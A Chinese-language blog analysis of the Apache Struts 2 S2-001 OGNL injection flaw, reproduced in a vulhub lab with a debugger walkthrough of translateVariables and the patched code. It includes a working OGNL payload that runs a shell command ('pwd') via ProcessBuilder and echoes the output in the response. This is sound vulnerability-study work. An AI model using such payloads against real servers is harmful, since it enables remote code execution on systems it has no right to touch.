S2-001复现分析

一、漏洞信息

漏洞信息页面:

S2-001 - Apache Struts 2 Wiki - Apache Software Foundation

漏洞类型:

RCE(远程代码执行)

受影响组件:

WebWork 2.1 (with altSyntax enabled), WebWork 2.2.0 - WebWork 2.2.5, Struts 2.0.0 - Struts 2.0.8

漏洞成因:

WebWork 2.1+和 Struts 2的altSyntax特性允许将OGNL表达式插入到文本字符串中并递归处理。当恶意用户提交包含OGNL表达式的字符串,且将用户输入返回到当前页面时,服务器将执行该表达式。

二、环境搭建

IDE:Eclipse IDE for Enterprise Java and Web Developers

Java:JDK1.8

Tomcat:8.5.75

Struts:2.0.8(https://github.com/vulhub/vulhub/struts/s2-001)

三、漏洞利用

OGNL表达式%、#和$用法详解

在username或password输入OGNL表达式语句即可触发漏洞。

S2-001复现分析
S2-001复现分析

执行任意命令并回显。

%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"pwd"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}

四、漏洞分析

1. Struts2相关

Struts2处理用户请求的完整流程

S2-001复现分析

Struts2在接收用户请求后(⑥)以及发送响应前(⑧)会使用拦截器进行处理。

WEB-INF/classes目录下的struts.xml中显示了使用的拦截器为struts默认拦截器。

S2-001复现分析

struts-default.xml位于struts2-core-2.0.8.jar中。关注params拦截器,该拦截器负责解析HTTP请求中的参数,并将参数值设置成Action对应的属性值。

S2-001复现分析

2. 调试分析

找到params拦截器所在类,在doIntercept()函数中下断点。开始调试,web页面输入username为admin,password为%{2*3}。

运行到setParameters,该函数根据请求参数设置action。

S2-001复现分析

继续运行到invocation.invoke(),步入函数。

S2-001复现分析

后续函数调用栈如下

S2-001复现分析

运行到index.jsp第14行,单步步入,直到运行到doStartTag()

S2-001复现分析

doStartTag()开始处理struts标签。此时处理的是s:form标签。

S2-001复现分析

在doStartTag()下断点,运行到处理password标签。

S2-001复现分析

跳出doStartTag(),在index.jsp第16行password处再次单步步入,进入doEndTag,步入component.end函数。

S2-001复现分析

跟踪到evaluateParams(),步入函数。

S2-001复现分析

跟踪到addParameter(),由于开启了表达式语法,altSyntax()返回ture,expr变为%{password}

S2-001复现分析

步入findValue(),跟踪到TextParseUtil.translateVariables,步入函数。

S2-001复现分析

translateVariables函数源码如下

public static Object translateVariables(char open, String expression, ValueStack stack, Class asType, ParsedValueEvaluator evaluator) {
  Object result = expression;
  
  while (true) {
    int start = expression.indexOf(open + "{");
    int length = expression.length();
    int x = start + 2;

    
    int count = 1;
    while (start != -1 && x < length && count != 0) {
      char c = expression.charAt(x++);
      if (c == '{') {
        count++; continue;
      }  if (c == '}') {
        count--;
      }
    } 
    int end = x - 1;
    
    if (start != -1 && end != -1 && count == 0) {
      String var = expression.substring(start + 2, end);
      
      Object o = stack.findValue(var, asType);
      if (evaluator != null) {	
        o = evaluator.evaluate(o);
      }

      
      String left = expression.substring(0, start);
      String right = expression.substring(end + 1);
      if (o != null) {
        if (TextUtils.stringSet(left)) {
          result = left + o;
        } else {
          result = o;
        } 
        
        if (TextUtils.stringSet(right)) {
          result = result + right;
        }
        
        expression = left + o + right;
        continue;
      } 
      result = left + right;
      expression = left + right;
      
      continue;
    } 
    
    break;
  } 
  return XWorkConverter.getInstance().convertValue(stack.getContext(), result, asType);
}

在while的第一次循环中,通过stack.findValue获取到password的值,即为输入%{2*3}

S2-001复现分析

第一次循环结束时,expression和result被赋值为%{2*3}

S2-001复现分析

在第二次循环中,通过stack.findValue,将var中内容执行,o被赋值为6

S2-001复现分析

进入第三次循环,因为expression不为表达式,循环结束。

五、漏洞修复

public static Object translateVariables(char open, String expression, ValueStack stack, Class asType, ParsedValueEvaluator evaluator, int maxLoopCount) {
    // deal with the "pure" expressions first!
    //expression = expression.trim();
    Object result = expression;
    int loopCount = 1;
    int pos = 0;
    while (true) {

        int start = expression.indexOf(open + "{", pos);
        if (start == -1) {
            pos = 0;
            loopCount++;
            start = expression.indexOf(open + "{");
        }
        if (loopCount > maxLoopCount) {		//默认只进行一次循环,不再递归解析
            // translateVariables prevent infinite loop / expression recursive evaluation
            break;
        }
        int length = expression.length();
        int x = start + 2;
        int end;
        char c;
        int count = 1;
        while (start != -1 && x < length && count != 0) {
            c = expression.charAt(x++);
            if (c == '{') {
                count++;
            } else if (c == '}') {
                count--;
            }
        }
        end = x - 1;

        if ((start != -1) && (end != -1) && (count == 0)) {
            String var = expression.substring(start + 2, end);

            Object o = stack.findValue(var, asType);
            if (evaluator != null) {
                o = evaluator.evaluate(o);
            }


            String left = expression.substring(0, start);
            String right = expression.substring(end + 1);
            String middle = null;
            if (o != null) {
                middle = o.toString();
                if (!TextUtils.stringSet(left)) {
                    result = o;
                } else {
                    result = left + middle;
                }

                if (TextUtils.stringSet(right)) {
                    result = result + right;
                }

                expression = left + middle + right;
            } else {
                // the variable doesn't exist, so don't display anything
                result = left + right;
                expression = left + right;
            }
            pos = (left != null && left.length() > 0 ? left.length() - 1: 0) +
                  (middle != null && middle.length() > 0 ? middle.length() - 1: 0) +
                  1;
            pos = Math.max(pos, 1);
        } else {
            break;
        }
    }

    return XWorkConverter.getInstance().convertValue(stack.getContext(), result, asType);
}

参考链接

https://xz.aliyun.com/t/2044

上一篇:JavaScript常用字符串属性及处理函数


下一篇:[BZOJ3894]文理分科